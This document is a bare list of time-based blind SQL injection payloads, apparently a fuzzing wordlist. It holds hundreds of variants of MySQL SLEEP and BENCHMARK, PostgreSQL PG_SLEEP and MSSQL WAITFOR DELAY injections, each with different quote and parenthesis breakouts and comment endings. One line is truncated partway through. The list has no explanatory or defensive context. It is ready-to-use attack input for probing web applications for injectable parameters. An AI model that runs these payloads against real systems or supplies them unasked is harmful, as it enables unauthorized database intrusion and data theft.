 OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
' OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
' OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
' OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
' OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
" OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
" OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
" OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
" OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
') OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
') OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
') OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
') OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
") OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
") OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
") OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
") OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
')) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
')) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
')) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
')) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
"))) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
"))) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
"))) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
"))) OR 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
 OR ELT(1337 LIKE 1337,SLEEP(10))--+-
' OR ELT(1337 LIKE 1337,SLEEP(10))--+-
' OR ELT(1337 LIKE 1337,SLEEP(10))#
' OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
' OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
" OR ELT(1337 LIKE 1337,SLEEP(10))--+-
" OR ELT(1337 LIKE 1337,SLEEP(10))#
" OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
" OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
') OR ELT(1337 LIKE 1337,SLEEP(10))--+-
') OR ELT(1337 LIKE 1337,SLEEP(10))#
') OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
') OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
") OR ELT(1337 LIKE 1337,SLEEP(10))--+-
") OR ELT(1337 LIKE 1337,SLEEP(10))#
") OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
") OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
')) OR ELT(1337 LIKE 1337,SLEEP(10))--+-
')) OR ELT(1337 LIKE 1337,SLEEP(10))#
')) OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
')) OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
"))) OR ELT(1337 LIKE 1337,SLEEP(10))--+-
"))) OR ELT(1337 LIKE 1337,SLEEP(10))#
"))) OR ELT(1337 LIKE 1337,SLEEP(10)) AND '
"))) OR ELT(1337 LIKE 1337,SLEEP(10)) AND "
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))--+-
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))#
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND '
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN (SELECT 1337 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) AND "
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
' ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
" ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
') ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
") ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
')) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))--+-
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END))#
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND '
"))) ,(SELECT (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)) AND "
' (SELECT (CASE WHEN (1337 LIKE 1337) THEN (
 RLIKE SLEEP(10)--+-
' RLIKE SLEEP(10)--+-
' RLIKE SLEEP(10)#
' RLIKE SLEEP(10) AND '
' RLIKE SLEEP(10) AND "
" RLIKE SLEEP(10)--+-
" RLIKE SLEEP(10)#
" RLIKE SLEEP(10) AND '
" RLIKE SLEEP(10) AND "
') RLIKE SLEEP(10)--+-
') RLIKE SLEEP(10)#
') RLIKE SLEEP(10) AND '
') RLIKE SLEEP(10) AND "
") RLIKE SLEEP(10)--+-
") RLIKE SLEEP(10)#
") RLIKE SLEEP(10) AND '
") RLIKE SLEEP(10) AND "
')) RLIKE SLEEP(10)--+-
')) RLIKE SLEEP(10)#
')) RLIKE SLEEP(10) AND '
')) RLIKE SLEEP(10) AND "
"))) RLIKE SLEEP(10)--+-
"))) RLIKE SLEEP(10)#
"))) RLIKE SLEEP(10) AND '
"))) RLIKE SLEEP(10) AND "
' OR SLEEP(10)--+-
' OR SLEEP(10)#
' OR SLEEP(10) AND '
' OR SLEEP(10) AND "
" OR SLEEP(10)--+-
" OR SLEEP(10)#
" OR SLEEP(10) AND '
" OR SLEEP(10) AND "
') OR SLEEP(10)--+-
') OR SLEEP(10)#
') OR SLEEP(10) AND '
') OR SLEEP(10) AND "
") OR SLEEP(10)--+-
") OR SLEEP(10)#
") OR SLEEP(10) AND '
") OR SLEEP(10) AND "
')) OR SLEEP(10)--+-
')) OR SLEEP(10)#
')) OR SLEEP(10) AND '
')) OR SLEEP(10) AND "
"))) OR SLEEP(10)--+-
"))) OR SLEEP(10)#
"))) OR SLEEP(10) AND '
"))) OR SLEEP(10) AND "
' (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
' (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
' (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
' (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
" (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
" (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
" (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
" (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
') (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
') (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
') (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
') (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
") (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
") (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
") (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
") (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
')) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
')) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
')) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
')) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
"))) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
"))) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
"))) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
"))) (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
' ELT(1337 LIKE 1337,SLEEP(10))--+-
' ELT(1337 LIKE 1337,SLEEP(10))#
' ELT(1337 LIKE 1337,SLEEP(10)) AND '
' ELT(1337 LIKE 1337,SLEEP(10)) AND "
" ELT(1337 LIKE 1337,SLEEP(10))--+-
" ELT(1337 LIKE 1337,SLEEP(10))#
" ELT(1337 LIKE 1337,SLEEP(10)) AND '
" ELT(1337 LIKE 1337,SLEEP(10)) AND "
') ELT(1337 LIKE 1337,SLEEP(10))--+-
') ELT(1337 LIKE 1337,SLEEP(10))#
') ELT(1337 LIKE 1337,SLEEP(10)) AND '
') ELT(1337 LIKE 1337,SLEEP(10)) AND "
") ELT(1337 LIKE 1337,SLEEP(10))--+-
") ELT(1337 LIKE 1337,SLEEP(10))#
") ELT(1337 LIKE 1337,SLEEP(10)) AND '
") ELT(1337 LIKE 1337,SLEEP(10)) AND "
')) ELT(1337 LIKE 1337,SLEEP(10))--+-
')) ELT(1337 LIKE 1337,SLEEP(10))#
')) ELT(1337 LIKE 1337,SLEEP(10)) AND '
')) ELT(1337 LIKE 1337,SLEEP(10)) AND "
"))) ELT(1337 LIKE 1337,SLEEP(10))--+-
"))) ELT(1337 LIKE 1337,SLEEP(10))#
"))) ELT(1337 LIKE 1337,SLEEP(10)) AND '
"))) ELT(1337 LIKE 1337,SLEEP(10)) AND "
 AND SLEEP(10)--+-
' AND SLEEP(10)--+-
' AND SLEEP(10)#
' AND SLEEP(10) AND '
' AND SLEEP(10) AND "
" AND SLEEP(10)--+-
" AND SLEEP(10)#
" AND SLEEP(10) AND '
" AND SLEEP(10) AND "
') AND SLEEP(10)--+-
') AND SLEEP(10)#
') AND SLEEP(10) AND '
') AND SLEEP(10) AND "
") AND SLEEP(10)--+-
") AND SLEEP(10)#
") AND SLEEP(10) AND '
") AND SLEEP(10) AND "
')) AND SLEEP(10)--+-
')) AND SLEEP(10)#
')) AND SLEEP(10) AND '
')) AND SLEEP(10) AND "
"))) AND SLEEP(10)--+-
"))) AND SLEEP(10)#
"))) AND SLEEP(10) AND '
"))) AND SLEEP(10) AND "
' AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
' AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
' AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
' AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
" AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
" AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
" AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
" AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
') AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
') AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
') AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
') AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
") AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
") AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
") AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
") AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
')) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
')) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
')) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
')) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
"))) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))--+-
"))) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10))#
"))) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND '
"))) AND 1337 LIKE (SELECT 1337 FROM PG_SLEEP(10)) AND "
 (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
' (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
' (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
' (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
' (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
" (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
" (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
" (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
" (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
') (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
') (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
') (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
') (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
") (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
") (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
") (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
") (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
')) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
')) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
')) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
')) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
"))) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)--+-
"))) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END)#
"))) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND '
"))) (CASE WHEN (1337 LIKE 1337) THEN SLEEP(10) ELSE 1337 END) AND "
 AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
' AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
' AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
' AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
' AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
" AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
" AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
" AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
" AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
') AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
') AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
') AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
') AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
") AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
") AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
") AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
") AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
')) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
')) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
')) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
')) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
"))) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
"))) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
"))) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
"))) AND (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
 (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
' (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
' (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
' (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
' (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
" (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
" (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
" (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
" (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
') (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
') (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
') (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
') (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
") (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
") (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
") (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
") (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
')) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
')) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
')) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
')) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
"))) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)--+-
"))) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337)#
"))) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND '
"))) (CASE WHEN (1337 LIKE 1337) THEN (SELECT BENCHMARK(10000,MD5('Y4T0G4M11337'))) ELSE 1337) AND "
;WAITFOR DELAY '0:0:10'--+-
' WAITFOR DELAY '0:0:10'--+-
' WAITFOR DELAY '0:0:10'#
' WAITFOR DELAY '0:0:10' AND '
' WAITFOR DELAY '0:0:10' AND "
" WAITFOR DELAY '0:0:10'--+-
" WAITFOR DELAY '0:0:10'#
" WAITFOR DELAY '0:0:10' AND '
" WAITFOR DELAY '0:0:10' AND "
') WAITFOR DELAY '0:0:10'--+-
') WAITFOR DELAY '0:0:10'#
') WAITFOR DELAY '0:0:10' AND '
') WAITFOR DELAY '0:0:10' AND "
") WAITFOR DELAY '0:0:10'--+-
") WAITFOR DELAY '0:0:10'#
") WAITFOR DELAY '0:0:10' AND '
") WAITFOR DELAY '0:0:10' AND "
')) WAITFOR DELAY '0:0:10'--+-
')) WAITFOR DELAY '0:0:10'#
')) WAITFOR DELAY '0:0:10' AND '
')) WAITFOR DELAY '0:0:10' AND "
"))) WAITFOR DELAY '0:0:10'--+-
"))) WAITFOR DELAY '0:0:10'#
"))) WAITFOR DELAY '0:0:10' AND '
"))) WAITFOR DELAY '0:0:10' AND "
 (SELECT 1337 FROM PG_SLEEP(10))--+-
' (SELECT 1337 FROM PG_SLEEP(10))--+-
' (SELECT 1337 FROM PG_SLEEP(10))#
' (SELECT 1337 FROM PG_SLEEP(10)) AND '
' (SELECT 1337 FROM PG_SLEEP(10)) AND "
" (SELECT 1337 FROM PG_SLEEP(10))--+-
" (SELECT 1337 FROM PG_SLEEP(10))#
" (SELECT 1337 FROM PG_SLEEP(10)) AND '
" (SELECT 1337 FROM PG_SLEEP(10)) AND "
') (SELECT 1337 FROM PG_SLEEP(10))--+-
') (SELECT 1337 FROM PG_SLEEP(10))#
') (SELECT 1337 FROM PG_SLEEP(10)) AND '
') (SELECT 1337 FROM PG_SLEEP(10)) AND "
") (SELECT 1337 FROM PG_SLEEP(10))--+-
") (SELECT 1337 FROM PG_SLEEP(10))#
") (SELECT 1337 FROM PG_SLEEP(10)) AND '
") (SELECT 1337 FROM PG_SLEEP(10)) AND "
')) (SELECT 1337 FROM PG_SLEEP(10))--+-
')) (SELECT 1337 FROM PG_SLEEP(10))#
')) (SELECT 1337 FROM PG_SLEEP(10)) AND '
')) (SELECT 1337 FROM PG_SLEEP(10)) AND "
"))) (SELECT 1337 FROM PG_SLEEP(10))--+-
"))) (SELECT 1337 FROM PG_SLEEP(10))#
"))) (SELECT 1337 FROM PG_SLEEP(10)) AND '
"))) (SELECT 1337 FROM PG_SLEEP(10)) AND "
' OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
' OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
' OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
' OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
" OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
" OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
" OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
" OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
') OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
') OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
') OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
') OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
") OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
") OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
") OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
") OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
')) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
')) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
')) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
')) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
"))) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
"))) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
"))) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
"))) OR (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
' RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
' RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
